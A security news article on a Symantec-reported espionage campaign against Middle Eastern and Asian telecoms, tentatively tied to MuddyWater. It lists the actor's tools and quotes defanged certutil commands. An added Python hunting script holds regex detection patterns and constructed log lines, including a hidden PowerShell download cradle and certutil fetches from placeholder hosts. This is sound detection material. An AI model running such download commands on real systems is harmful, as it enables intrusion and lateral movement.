Privacy Ninja

Telecom Operators Targeted in Recent Espionage Hacking Campaign

Researchers have spotted a new espionage hacking campaign targeting telecommunication and IT service providers in the Middle East and Asia.

The campaign has been conducted over the past six months, and there are tentative links to the Iranian-backed actor MERCURY (aka MuddyWater, SeedWorm, or TEMP.Zagros).

The report comes from Symantec's Threat Hunter Team, which collected evidence and toolset samples from recent attacks in Israel, Jordan, Kuwait, Saudi Arabia, the United Arab Emirates, Pakistan, Thailand, and Laos.

Targeting Exchange servers

The attackers appear to be most interested in vulnerable Exchange Servers, which they use for web shell deployment.

After the initial breach, they steal account credentials and move laterally in the corporate network. In some cases, they use their foothold to pivot to other connected organizations.

Although the infection vector is unknown, Symantec was able to find a case of a ZIP file named “Special discount program.zip,” which contained an installer for a remote desktop software application.

As such, the threat actors may be distributing spear-phishing emails to specific targets.

Tools and methods

The first sign of compromise by the threat actors is typically the creation of a Windows service to launch a Windows Script File (WSF) that performs reconnaissance on the network.

Next, PowerShell is used to download more WSFs, Certutil is used to download tunneling tools, and WMI queries are run.

“Based on process lineage data, attackers seemed to use scripts extensively. These may be automated scripts used for collecting information and downloading additional tools,” explains Symantec’s report.

“However, in one instance, a command asks cURL for help, suggesting that there may have been at least some hands-on-keyboard activity on the part of the attackers.”

Having established a presence in the target organization, the actors use the eHorus remote access tool, which enables them to do the following:

  1. Deliver and run a (suspected) Local Security Authority Subsystem Service (LSASS) dumping tool.
  2. Deliver (what are believed to be) Ligolo tunneling tools.
  3. Execute Certutil to request a URL from Exchange Web Services (EWS) of (what appears to be) other targeted organizations.

To pivot to other telcos, the actors look for potential Exchange Web Services links and use the following commands for this purpose:

certutil.exe -urlcache -split [DASH]f hxxps://[REDACTED]/ews/exchange[.]asmx
certutil.exe -urlcache -split [DASH]f hxxps://webmail.[REDACTED][.]com/ews
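The behaviours described in this section (a Windows service launching a WSF, PowerShell fetching further WSFs, and Certutil used as a downloader, including the EWS lookups above) are all visible in process-creation telemetry. The following is an added hunting example, not code from the article or from Symantec: it classifies process-creation records against those patterns. The field names mimic Sysmon Event ID 1, but every record, hostname and URL below is constructed for illustration. Note that the regexes expect the real URLs found in logs, not the defanged hxxps/[.] form the article prints.

```python
"""Hunt process-creation records for the tradecraft described in the article.

Added example (not the article's or Symantec's code). Sample telemetry is
constructed; hostnames and URLs are placeholders, not indicators.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


# Certutil download abuse: -urlcache, -split and -f present together, in any order.
CERTUTIL_DOWNLOAD = re.compile(r"(?=.*-urlcache\b)(?=.*-split\b)(?=.*-f\b)", re.IGNORECASE)
# A URL ending in /ews or /ews/exchange.asmx, i.e. an Exchange Web Services endpoint.
EWS_URL = re.compile(r"https?://[^\s\"']+/ews(?:/exchange\.asmx)?(?=[\s\"']|$)", re.IGNORECASE)
# Common PowerShell download primitives.
PS_DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b", re.IGNORECASE)
WSF_ARG = re.compile(r"\.wsf\b", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def classify(ev: ProcessEvent) -> List[str]:
    """Return the behaviour tags an event matches; an empty list means nothing of note."""
    hits: List[str] = []
    image, parent, cmd = _basename(ev.image), _basename(ev.parent_image), ev.command_line

    if image == "certutil.exe" and CERTUTIL_DOWNLOAD.search(cmd):
        hits.append("certutil_download")
        if EWS_URL.search(cmd):
            # The EWS requests the actors use to find other organisations to pivot into.
            hits.append("certutil_ews_probe")

    if image in ("wscript.exe", "cscript.exe") and WSF_ARG.search(cmd):
        # A service-launched WSF is the first sign of compromise the report describes.
        hits.append("service_launched_wsf" if parent == "services.exe" else "wsf_execution")

    if image in ("powershell.exe", "pwsh.exe") and PS_DOWNLOAD.search(cmd) and WSF_ARG.search(cmd):
        hits.append("powershell_wsf_download")

    return hits


def hunt(events: List[ProcessEvent]) -> Dict[str, List[str]]:
    """Group matched behaviours per host; hosts with no hits are omitted."""
    findings: Dict[str, List[str]] = {}
    for ev in events:
        for tag in classify(ev):
            findings.setdefault(ev.host, []).append(tag)
    return findings


# Constructed sample telemetry (not real incident data).
SAMPLE_EVENTS = [
    ProcessEvent("ex01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f https://webmail.example.invalid/ews"),
    ProcessEvent("ex01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f https://files.example.invalid/tunnel.exe tunnel.exe"),
    ProcessEvent("ws07", r"C:\Windows\System32\services.exe", r"C:\Windows\System32\wscript.exe",
                 r"wscript.exe C:\ProgramData\recon.wsf"),
    ProcessEvent("ws07", r"C:\Windows\System32\wscript.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('https://cdn.example.invalid/b.wsf','C:\ProgramData\b.wsf')"),
    ProcessEvent("ws07", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -verify C:\certs\server.cer"),
    ProcessEvent("srv02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
                 r"wscript.exe C:\Scripts\logon.vbs"),
]

if __name__ == "__main__":
    for host, tags in hunt(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(tags)}")
```

Because the tools themselves are legitimate, the value is in the combinations: Certutil with download switches, a script host whose parent is services.exe, or PowerShell pulling a .wsf. Certutil hitting an /ews endpoint is the most specific of these and is worth an alert of its own; the legitimate certificate-verification call and the logon script in the sample set produce no hits.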

The full toolset attributed to this actor is listed below:

  • ScreenConnect: Legitimate remote administration tool
  • RemoteUtilities: Legitimate remote administration tool
  • eHorus: Legitimate remote administration tool
  • Ligolo: Reverse tunneling tool
  • Hidec: Command line tool for running a hidden window
  • Nping: Packet generation tool
  • LSASS Dumper: Tool that dumps credentials from Local Security Authority Subsystem Service (LSASS) process
  • SharpChisel: Tunneling tool
  • Password Dumper
  • CrackMapExec: Publicly available tool that is used to automate security assessment of an Active Directory environment
  • ProcDump: Microsoft Sysinternals tool for monitoring an application for CPU spikes and generating crash dumps, but which can also be used as a general process dump utility
  • SOCKS5 proxy server: Tunneling tool
  • Keylogger: Retrieves browser credentials
  • Mimikatz: Publicly available credential dumping tool

Most of these tools are publicly available and commonly used by offensive security teams, so their presence may not trigger alarms in targeted organizations.

Links to MuddyWater

Even though the attribution isn’t definitive, Symantec logged two IP addresses that overlap with infrastructure used in older MuddyWater attacks.

Moreover, the toolset features several similarities to March 2021 attacks reported by Trend Micro researchers.

Still, many Iranian state-supported actors use off-the-shelf tools and regularly switch infrastructure, and as such, no conclusive attribution can be made at this time.
